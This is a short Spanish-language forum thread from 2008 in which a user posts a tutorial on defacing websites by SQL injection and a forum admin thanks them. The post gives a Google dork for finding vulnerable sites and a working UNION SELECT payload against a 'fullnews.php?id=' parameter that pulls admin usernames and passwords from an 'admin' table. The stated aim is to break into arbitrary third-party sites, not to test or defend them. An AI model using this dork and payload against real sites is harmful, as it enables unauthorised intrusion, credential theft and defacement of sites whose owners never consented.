Druéh
Cantidad de envíos : 19 Fecha de inscripción : 25/02/2008
| Tema: Intrusión mediante Inyección SQL [By Dreahss] Lun Feb 25, 2008 8:40 pm | |
| [Pequeño Tutorial]Desfac mediante inyección SQL Dork: "Browse with Interactive Map"[[al poner esto en google,este nos mostrara las paginas con esta vulnerabilidad]] Bien,seguido de esto entrariamos a la pagina y usariamos el exploit,que es el siguiente www.La pagina que probemos.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/* si esto resulta,se nos mostrara el nombre del admind y la pass | |
|
Admin Admin
Cantidad de envíos : 128 Fecha de inscripción : 02/10/2007
| Tema: Re: Intrusión mediante Inyección SQL [By Dreahss] Lun Feb 25, 2008 10:34 pm | |
| Gracdias por tu Aporte Men. va hacer de gran utilidad. | |
|